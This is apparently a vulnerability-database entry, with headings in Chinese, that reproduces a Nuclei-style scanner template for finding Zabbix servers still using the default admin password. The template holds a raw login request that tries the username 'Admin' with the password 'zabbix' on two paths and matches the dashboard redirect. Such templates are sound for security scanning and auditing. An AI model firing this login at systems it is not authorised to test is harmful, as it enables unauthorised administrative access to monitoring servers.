zabbix-default-login: Zabbix Default Login

日期: 2025-08-01 | 影响软件: Zabbix | POC: 已公开

漏洞描述

Zabbix default admin credentials were discovered.

PoC代码[已公开]

id: zabbix-default-login

info:
  name: Zabbix Default Login
  author: pdteam
  severity: high
  description: Zabbix default admin credentials were discovered.
  reference:
    - https://openbaton.github.io/documentation/zabbix-server-configuration-3.0/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 2
  tags: zabbix,default-login,vuln

http:
  - raw:
      - |
        POST {{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest

        name={{username}}&password={{password}}&autologin=1&enter=Sign+in

    payloads:
      path:
        - /index.php
        - /zabbix/index.php
      username:
        - Admin
      password:
        - zabbix
    attack: clusterbomb

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "zabbix.php?action=dashboard.view"

      - type: status
        status:
          - 302
# digest: 4b0a00483046022100897977d0df9e94f9121482f592f280dacc36fa03722732abcd3bbf504969fc7b022100d378b9567f88a02a630dbb8a6536f25d1cd7262cfc8934df4bff978e45027d9d:922c64590222798bb761d5b6d8e72950

相关漏洞推荐